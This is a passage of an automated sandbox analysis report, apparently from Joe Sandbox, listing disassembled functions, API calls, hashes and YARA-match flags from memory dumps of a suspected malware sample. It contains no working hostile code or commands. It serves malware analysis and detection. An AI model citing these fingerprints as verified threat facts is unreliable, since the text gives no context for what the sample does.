                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                                            • String ID: eventObject
                                                            • API String ID: 1999291547-1680012138
                                                            • Opcode ID: f2fd52a031fb61bc76af8f85f01e8766478cf52a27c2f29204c16f3f9ad69e75
                                                            • Instruction ID: 74ee1ce6077461ea63ae9e00130f3aceb1e9566028cac9141ddd6988e3fa2b51
                                                            • Opcode Fuzzy Hash: f2fd52a031fb61bc76af8f85f01e8766478cf52a27c2f29204c16f3f9ad69e75
                                                            • Instruction Fuzzy Hash: 6511A075600105EACB14EFA5CC49FEF77B8AF00701F20012BF42AE21D1DB789E85866D
                                                            APIs
                                                            • _free.LIBCMT ref: 00431E1A
                                                              • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                              • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                            • _free.LIBCMT ref: 00431E26
                                                            • _free.LIBCMT ref: 00431E31
                                                            • _free.LIBCMT ref: 00431E3C
                                                            • _free.LIBCMT ref: 00431E47
                                                            • _free.LIBCMT ref: 00431E52
                                                            • _free.LIBCMT ref: 00431E5D
                                                            • _free.LIBCMT ref: 00431E68
                                                            • _free.LIBCMT ref: 00431E73
                                                            • _free.LIBCMT ref: 00431E81
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                            • Instruction ID: 37ceee84360c9df2d19b7be330e975e9230a82d8295317da332a0d8bba7d8220
                                                            • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                            • Instruction Fuzzy Hash: 9111A476100508AFCB02EF56C852CD93BA5EF18355F1190AAFA088F232DA76EF519F84
                                                            APIs
                                                            • _free.LIBCMT ref: 00A82081
                                                              • Part of subcall function 00A836F1: HeapFree.KERNEL32(00000000,00000000,?,00A8A37F,?,00000000,?,00000000,?,00A8A623,?,00000007,?,?,00A8AA17,?), ref: 00A83707
                                                              • Part of subcall function 00A836F1: GetLastError.KERNEL32(?,?,00A8A37F,?,00000000,?,00000000,?,00A8A623,?,00000007,?,?,00A8AA17,?,?), ref: 00A83719
                                                            • _free.LIBCMT ref: 00A8208D
                                                            • _free.LIBCMT ref: 00A82098
                                                            • _free.LIBCMT ref: 00A820A3
                                                            • _free.LIBCMT ref: 00A820AE
                                                            • _free.LIBCMT ref: 00A820B9
                                                            • _free.LIBCMT ref: 00A820C4
                                                            • _free.LIBCMT ref: 00A820CF
                                                            • _free.LIBCMT ref: 00A820DA
                                                            • _free.LIBCMT ref: 00A820E8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                            • Instruction ID: dc09fae471821eca2b5992b4c4ff4cc63313f2bd26629037dea188cce6a50761
                                                            • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                            • Instruction Fuzzy Hash: 94117476510148BFCF01FF58CA52DDE3BA9EF04790B5149A5BA088F222EA31DF609B80
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: __cftoe
                                                            • String ID: f(@$f(@
                                                            • API String ID: 4189289331-2391611762
                                                            • Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                            • Instruction ID: 3bb8b72b3fcb016b6809a9d2676edbb9e39e2dfdcc2cff5661f77b8cf8a8e7b7
                                                            • Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                            • Instruction Fuzzy Hash: 8F511B32600215EBDB249B5BAC41EAF77ADEF49325F90425FF815D6282DB3DD900867C
                                                            APIs
                                                            • _ValidateLocalCookies.LIBCMT ref: 0042871B
                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00428723
                                                            • _ValidateLocalCookies.LIBCMT ref: 004287B1
                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 004287DC
                                                            • _ValidateLocalCookies.LIBCMT ref: 00428831
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                            • String ID: 11@$@fB$csm
                                                            • API String ID: 1170836740-1464837749
                                                            • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                            • Instruction ID: 85514cbf9916709cbd5a6cdf55cb31cf47df2c82886cb460035ca25a3a5e93b8
                                                            • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                            • Instruction Fuzzy Hash: E6411634B012289BCF00DF29DC41A9E7BB1AF80328F64815FE8146B392DB399D11CB99
                                                            APIs
                                                            • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00A74AED
                                                              • Part of subcall function 00A74DBC: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00A74820), ref: 00A74DCC
                                                            • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 00A74B02
                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A74B11
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A74B1F
                                                            • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 00A74B95
                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A74BD5
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A74BE3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                            • String ID: 11@
                                                            • API String ID: 3151764488-1785270423
                                                            • Opcode ID: 5099532818571cbbdf9efb1b5aa3717eeed6167c85065a7cf9a3e62c5dc9f912
                                                            • Instruction ID: 0e131b81a5cba3868148b44728170e325ba95573b8138983426b3316bff1c66c
                                                            • Opcode Fuzzy Hash: 5099532818571cbbdf9efb1b5aa3717eeed6167c85065a7cf9a3e62c5dc9f912
                                                            • Instruction Fuzzy Hash: 2A31D435A002149BCF14EF68CD81A6D73B5BF89311F24C569E91997252DB70EE05C790
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3beae9f1c9406c94f3234c3fab2046d002450fb23d60068b3c1d9a8504aa6807
                                                            • Instruction ID: 3fb1a2daaa8b8829ebf679119c6e24d84aacf9faf249b785a1dfc945df24d9f1
                                                            • Opcode Fuzzy Hash: 3beae9f1c9406c94f3234c3fab2046d002450fb23d60068b3c1d9a8504aa6807
                                                            • Instruction Fuzzy Hash: F2C12772D04349AFCF16EFA8C841BADBBB4BF09B01F148199E854A7392D7709A41CB65
                                                            APIs
                                                              • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                              • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                              • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                            • _memcmp.LIBVCRUNTIME ref: 0043118C
                                                            • _free.LIBCMT ref: 004311FD
                                                            • _free.LIBCMT ref: 00431216
                                                            • _free.LIBCMT ref: 00431248
                                                            • _free.LIBCMT ref: 00431251
                                                            • _free.LIBCMT ref: 0043125D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorLast$_memcmp
                                                            • String ID: 11@
                                                            • API String ID: 4275183328-1785270423
                                                            • Opcode ID: e83dd170e9aceaa49a18aa447ce4e6aa2231a1eba3255cf494227ba5bae8955a
                                                            • Instruction ID: ce7b668dfa5c2bb7c4e9a3ceca6e831dbf532e5f0ec0879f8663b0dec614f287
                                                            • Opcode Fuzzy Hash: e83dd170e9aceaa49a18aa447ce4e6aa2231a1eba3255cf494227ba5bae8955a
                                                            • Instruction Fuzzy Hash: ABB13975A016199FDB24DF18C894AAEB7B4FF08304F1086EEE949A7360D775AE90CF44
                                                            APIs
                                                              • Part of subcall function 00A82161: GetLastError.KERNEL32(?,?,00A7AA0C,?,00000000,?,00A7CE06,00A5249A,00000000,?,00451F20), ref: 00A82165
                                                              • Part of subcall function 00A82161: _free.LIBCMT ref: 00A82198
                                                              • Part of subcall function 00A82161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A821D9
                                                            • _free.LIBCMT ref: 00A81464
                                                            • _free.LIBCMT ref: 00A8147D
                                                            • _free.LIBCMT ref: 00A814AF
                                                            • _free.LIBCMT ref: 00A814B8
                                                            • _free.LIBCMT ref: 00A814C4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _free$ErrorLast
                                                            • String ID: 11@$C
                                                            • API String ID: 3291180501-2085848483
                                                            • Opcode ID: 59ec6d9c9ee678a81a712376643e3923b663826dc85482b92aac5d645df1fc00
                                                            • Instruction ID: c7bd15b7bba19144aa025097222f030e7a808e000123b03438e48b5f312f84a0
                                                            • Opcode Fuzzy Hash: 59ec6d9c9ee678a81a712376643e3923b663826dc85482b92aac5d645df1fc00
                                                            • Instruction Fuzzy Hash: 72B12B75A012199FDB24EF18C985BADB7B8FF48304F5085AAE949A7350E731AE91CF40
                                                            APIs
                                                            • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 00A73071
                                                              • Part of subcall function 00A68AD2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 00A68ADD
                                                            • SafeSQueue.LIBCONCRT ref: 00A7308A
                                                            • Concurrency::location::_Assign.LIBCMT ref: 00A7314A
                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A7316B
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A73179
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                            • String ID: 11@
                                                            • API String ID: 3496964030-1785270423
                                                            • Opcode ID: 1108ac3f23d22df1866ed980c188d809bd5bf3cbbedc25416d83390793702934
                                                            • Instruction ID: c3375e779162c9ea5788f2e296ca76bf971f44c335dc4844a2410acbe6dad3fa
                                                            • Opcode Fuzzy Hash: 1108ac3f23d22df1866ed980c188d809bd5bf3cbbedc25416d83390793702934
                                                            • Instruction Fuzzy Hash: 4D311132600A119FCF24EF64CC41BAABBB4BF44710F11C669E81A8B282DB30ED05DBD0
                                                            APIs
                                                            • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00428D30
                                                            • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00428D49
                                                            • FindVITargetTypeInstance.LIBVCRUNTIME ref: 00428D50
                                                            • PMDtoOffset.LIBCMT ref: 00428D6F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: FindInstanceTargetType$Offset
                                                            • String ID: Bad dynamic_cast!
                                                            • API String ID: 1467055271-2956939130
                                                            • Opcode ID: e5f2063d30d8dc2abb1216183244daa9fe4e349d0d1adbdecd789d64e98e0801
                                                            • Instruction ID: c140271802722e6f94c7424985ceb8b8a000001532c96d06de554d190e41459b
                                                            • Opcode Fuzzy Hash: e5f2063d30d8dc2abb1216183244daa9fe4e349d0d1adbdecd789d64e98e0801
                                                            • Instruction Fuzzy Hash: A02132727062259FCF14DE65F906AAE77A8EF64724B60811FE900D32C1DF3CE805C6A9
                                                            APIs
                                                            • atomic_compare_exchange.LIBCONCRT ref: 00A6C6FC
                                                            • atomic_compare_exchange.LIBCONCRT ref: 00A6C720
                                                            • std::_Cnd_initX.LIBCPMT ref: 00A6C731
                                                            • std::_Cnd_initX.LIBCPMT ref: 00A6C73F
                                                              • Part of subcall function 00A51370: __Mtx_unlock.LIBCPMT ref: 00A51377
                                                            • std::_Cnd_initX.LIBCPMT ref: 00A6C74F
                                                              • Part of subcall function 00A6C40F: __Cnd_broadcast.LIBCPMT ref: 00A6C416
                                                            • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 00A6C75D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
                                                            • String ID: 11@
                                                            • API String ID: 4258476935-1785270423
                                                            • Opcode ID: a9be804968ec124da136a858fa875f7bf6ea548f420eac5ce240c38f8c534d78
                                                            • Instruction ID: 4ebf6e64c7a709f1eeb27c1f8b3639514eb2479ee6efad0df22acb444f923438
                                                            • Opcode Fuzzy Hash: a9be804968ec124da136a858fa875f7bf6ea548f420eac5ce240c38f8c534d78
                                                            • Instruction Fuzzy Hash: 2701F771A00605A7DB10B7A0CE4ABBD7378BF10320F540011F91097281EB74EB4587D1
                                                            APIs
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C69C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Exception@8Throw
                                                            • String ID: :3@$f(@$f(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                            • API String ID: 2005118841-316725708
                                                            • Opcode ID: 952463f700e975f9eb06248a0959d2f411cd4c1788934f8d026916f96b121d51
                                                            • Instruction ID: d382e3a4140bff2bd7f1e847cb7cd930782ec9a0d5dc38d66c16a87299b4fd47
                                                            • Opcode Fuzzy Hash: 952463f700e975f9eb06248a0959d2f411cd4c1788934f8d026916f96b121d51
                                                            • Instruction Fuzzy Hash: 8BF0FC72900208AAC714DB54DC82BAB33589B15305F14857BED41BA1C2EA7DAD05C79C
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D958,0042D958,?,?,?,004323A5,00000001,00000001,23E85006), ref: 004321AE
                                                            • __alloca_probe_16.LIBCMT ref: 004321E6
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,004323A5,00000001,00000001,23E85006,?,?,?), ref: 00432234
                                                            • __alloca_probe_16.LIBCMT ref: 004322CB
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043232E
                                                            • __freea.LIBCMT ref: 0043233B
                                                              • Part of subcall function 004336C7: RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
                                                            • __freea.LIBCMT ref: 00432344
                                                            • __freea.LIBCMT ref: 00432369
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 3864826663-0
                                                            • Opcode ID: b11f90d838427d37edd64e38e717b3af24babdf9d4b4099e4006f2966c914547
                                                            • Instruction ID: a5f38111fa01d07f603b669534a8c8f44d85fc048aacd33138e2e818ffff9497
                                                            • Opcode Fuzzy Hash: b11f90d838427d37edd64e38e717b3af24babdf9d4b4099e4006f2966c914547
                                                            • Instruction Fuzzy Hash: B8513672600606AFDB258F75CD81EBF37A9EB48754F24426AFD04E6250DBBCDC40C658
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: _free
                                                            • String ID:
                                                            • API String ID: 269201875-0
                                                            • Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                            • Instruction ID: 1cba7b180e09f8073ff63dd7a5e39a9331c2ed4ff1a144fb7a18fbb91be6d7aa
                                                            • Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                            • Instruction Fuzzy Hash: 0761F071900205AFDB24DF69C842B9ABBF4EF09710F10516BE884EB382E7799E418B59
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _free
                                                            • String ID:
                                                            • API String ID: 269201875-0
                                                            • Opcode ID: 9dd0af2cd9ac545e18683059acdc486e5edaf4f6a50a58f2a1e3dc1611189c70
                                                            • Instruction ID: 91ff5bb15759c577e2d1c94ea1eb8779adae3a33002251edee5dad872bd27265
                                                            • Opcode Fuzzy Hash: 9dd0af2cd9ac545e18683059acdc486e5edaf4f6a50a58f2a1e3dc1611189c70
                                                            • Instruction Fuzzy Hash: 0461E136D00205AFEB20EF68C842B9EBBF4EF15710F1445AAF844EB391EB719D418B51
                                                            APIs
                                                            • GetConsoleCP.KERNEL32(?,0042C25D,E0830C40,?,?,?,?,?,?,00434018,0040DDFA,0042C25D,?,0042C25D,0042C25D,0040DDFA), ref: 004338E5
                                                            • __fassign.LIBCMT ref: 00433960
                                                            • __fassign.LIBCMT ref: 0043397B
                                                            • WideCharToMultiByte.KERNEL32(?,00000000,0042C25D,00000001,?,00000005,00000000,00000000), ref: 004339A1
                                                            • WriteFile.KERNEL32(?,?,00000000,00434018,00000000,?,?,?,?,?,?,?,?,?,00434018,0040DDFA), ref: 004339C0
                                                            • WriteFile.KERNEL32(?,0040DDFA,00000001,00434018,00000000,?,?,?,?,?,?,?,?,?,00434018,0040DDFA), ref: 004339F9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                            • String ID:
                                                            • API String ID: 1324828854-0
                                                            • Opcode ID: 104bec089efa8ddbbf106d3ba7b26555e8bb7f605cb6606e0c3875e27b37aebe
                                                            • Instruction ID: 3302cc5d055cfa7cb2d102f804d659735755d65fc8cb0b0a8ea62d8a9f37e22e
                                                            • Opcode Fuzzy Hash: 104bec089efa8ddbbf106d3ba7b26555e8bb7f605cb6606e0c3875e27b37aebe
                                                            • Instruction Fuzzy Hash: 1E51B3B09002499FCB10DFA8D845BEEBBF4EF09701F14412BE556E7391E7349A51CB69
                                                            APIs
                                                            • GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,00A8427F,?,?,?,?,?,?), ref: 00A83B4C
                                                            • __fassign.LIBCMT ref: 00A83BC7
                                                            • __fassign.LIBCMT ref: 00A83BE2
                                                            • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 00A83C08
                                                            • WriteFile.KERNEL32(?,?,00000000,00A8427F,00000000,?,?,?,?,?,?,?,?,?,00A8427F,?), ref: 00A83C27
                                                            • WriteFile.KERNEL32(?,?,00000001,00A8427F,00000000,?,?,?,?,?,?,?,?,?,00A8427F,?), ref: 00A83C60
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                            • String ID:
                                                            • API String ID: 1324828854-0
                                                            • Opcode ID: 3d1a47c850e04374499698871a03745696c64c98de2feb07923d8311921bf8e0
                                                            • Instruction ID: 16a7a51c9cd2dbe7d4a327b79965861b3d37a30f7606e2bed05eed20f0b81cc4
                                                            • Opcode Fuzzy Hash: 3d1a47c850e04374499698871a03745696c64c98de2feb07923d8311921bf8e0
                                                            • Instruction Fuzzy Hash: 1C51A3B5D00209AFCF10DFA9D885AEEBBF4EF09700F14416AE955F7291E7309A45CB64
                                                            APIs
                                                            • _SpinWait.LIBCONCRT ref: 00A6B172
                                                              • Part of subcall function 00A611A8: _SpinWait.LIBCONCRT ref: 00A611C0
                                                            • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 00A6B186
                                                            • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00A6B1B8
                                                            • List.LIBCMT ref: 00A6B23B
                                                            • List.LIBCMT ref: 00A6B24A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                            • String ID: 6+A
                                                            • API String ID: 3281396844-2819411039
                                                            • Opcode ID: 6ffcc6e76adf532cd1f074ee0a3a399835260594ca9526c60de83cd6ea276e11
                                                            • Instruction ID: 204f83112d4ca1a5789622398a303dd81cce7b4ed5bfa86aacab708674053e82
                                                            • Opcode Fuzzy Hash: 6ffcc6e76adf532cd1f074ee0a3a399835260594ca9526c60de83cd6ea276e11
                                                            • Instruction Fuzzy Hash: 69319A32D14656EFCB14EFA4CAA16EDBBB1BF06304F04026AD841B7652DB316D94CBA0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                            • Instruction ID: 44ae7d58254669835104620532439e4651bcdc670411f054606b0734315a2d03
                                                            • Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                            • Instruction Fuzzy Hash: B3112772A00215BFCB212FB3AC05E6B7A5CEF8A725F10063BF815D7240DA38890486A9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3d1ac6632e527dd31d058b85c9e7d58ea3761bf3ce0a696b0fb445ac4584affe
                                                            • Instruction ID: a914498ca9f0506bc9a3a7762cc8fa1157d142359bbb191e96a5bd7f70c7d433
                                                            • Opcode Fuzzy Hash: 3d1ac6632e527dd31d058b85c9e7d58ea3761bf3ce0a696b0fb445ac4584affe
                                                            • Instruction Fuzzy Hash: 7611D67250411ABFDB207F768D45D6B7AACEF96B60B108674FC19C7151DA308A00C7A0
                                                            APIs
                                                              • Part of subcall function 0043A0EA: _free.LIBCMT ref: 0043A113
                                                            • _free.LIBCMT ref: 0043A3F1
                                                              • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                              • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                            • _free.LIBCMT ref: 0043A3FC
                                                            • _free.LIBCMT ref: 0043A407
                                                            • _free.LIBCMT ref: 0043A45B
                                                            • _free.LIBCMT ref: 0043A466
                                                            • _free.LIBCMT ref: 0043A471
                                                            • _free.LIBCMT ref: 0043A47C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                            • Instruction ID: c6d5b65f25628cde0ea29edd4ff893f52e85bca0f905c5b3a1529a10dd86fb4b
                                                            • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                            • Instruction Fuzzy Hash: 3311A232580B04A6D521BF72CC07FCB77AC6F2C306F40981EB6DA7A052CA6EB5105B46
                                                            APIs
                                                              • Part of subcall function 00A8A351: _free.LIBCMT ref: 00A8A37A
                                                            • _free.LIBCMT ref: 00A8A658
                                                              • Part of subcall function 00A836F1: HeapFree.KERNEL32(00000000,00000000,?,00A8A37F,?,00000000,?,00000000,?,00A8A623,?,00000007,?,?,00A8AA17,?), ref: 00A83707
